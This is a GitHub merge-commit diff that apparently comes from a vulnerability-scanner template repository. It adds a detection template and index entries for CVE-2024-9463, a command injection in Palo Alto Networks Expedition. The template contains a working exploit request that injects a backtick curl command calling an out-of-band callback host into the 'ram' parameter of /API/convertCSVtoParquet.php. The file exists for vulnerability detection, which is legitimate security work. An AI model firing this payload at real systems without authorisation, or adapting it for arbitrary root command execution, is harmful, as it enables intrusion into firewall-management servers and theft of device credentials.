Skip to content

Commit c5b3cd1

Browse files
authored
Merge branch 'main' into update-CVE-2024-9465
2 parents dc6eaca + 4a5b217 commit c5b3cd1

File tree

6 files changed

+263
-204
lines changed

6 files changed

+263
-204
lines changed

.new-additions

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@ http/cves/2024/CVE-2024-7714.yaml
2626
http/cves/2024/CVE-2024-7854.yaml
2727
http/cves/2024/CVE-2024-8021.yaml
2828
http/cves/2024/CVE-2024-8877.yaml
29+
http/cves/2024/CVE-2024-9463.yaml
2930
http/cves/2024/CVE-2024-9465.yaml
3031
http/default-logins/datagerry/datagerry-default-login.yaml
3132
http/default-logins/netdisco/netdisco-default-login.yaml

cves.json

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2674,6 +2674,7 @@
26742674
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
26752675
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
26762676
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
2677+
{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
26772678
{"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"medium","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
26782679
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
26792680
{"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"}

cves.json-checksum.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
908cb06f6d5ef95a3bd764865f38785b
1+
dfbb91015830ffbfb93113bb530ae9bd

http/cves/2024/CVE-2024-9463.yaml

Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
id: CVE-2024-9463
2+
3+
info:
4+
name: PaloAlto Networks Expedition - Remote Code Execution
5+
author: princechaddha
6+
severity: critical
7+
description: |
8+
An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
9+
impact: |
10+
Successful exploitation could result in unauthorized access and control of the affected device.
11+
remediation: |
12+
Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
13+
reference: |
14+
- https://x.com/watchtowrcyber/status/1844306954245767623
15+
- https://security.paloaltonetworks.com/PAN-SA-2024-0010
16+
- https://github.com/fkie-cad/nvd-json-data-feeds
17+
- https://nvd.nist.gov/vuln/detail/CVE-2024-9463
18+
classification:
19+
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S
20+
cvss-score: 9.9
21+
cve-id: CVE-2024-9463
22+
cwe-id: CWE-78
23+
epss-score: 0.00043
24+
epss-percentile: 0.10347
25+
metadata:
26+
verified: true
27+
max-request: 1
28+
vendor: paloaltonetworks
29+
product: expedition
30+
shodan-query: http.favicon.hash:1499876150
31+
tags: cve,cve2024,palo-alto,rce
32+
33+
http:
34+
- raw:
35+
- |
36+
POST /API/convertCSVtoParquet.php HTTP/1.1
37+
Host: {{Hostname}}
38+
Content-Type: application/x-www-form-urlencoded
39+
40+
ram=watchTowr`curl+{{interactsh-url}}`
41+
42+
matchers-condition: and
43+
matchers:
44+
- type: word
45+
part: interactsh_protocol
46+
words:
47+
- "http"
48+
49+
- type: word
50+
part: body
51+
words:
52+
- "Undefined index: taskID"
53+
54+
# digest: 4b0a00483046022100cdd2c4cae04ab311f7a3d9ee79a7201da03b5bd8b8d9312e58ce403dbd6cdbf4022100c4e7133d66ad41e54e953aee946e7497909231938942cdb905aa31afdea28e4e:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-9465.yaml

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -60,3 +60,5 @@ http:
6060
- 'duration>=6'
6161
- 'status_code == 200'
6262
condition: and
63+
64+
# digest: 4b0a00483046022100905b5167207e7acc0dfa780c9c1d4b331df499f671267a4698fd994efcb3affa022100eec1110988072447630b0423feb2c23e97db4d8cf0d2e1ffa039e24cf05e488a:922c64590222798bb761d5b6d8e72950

0 commit comments

Comments
 (0)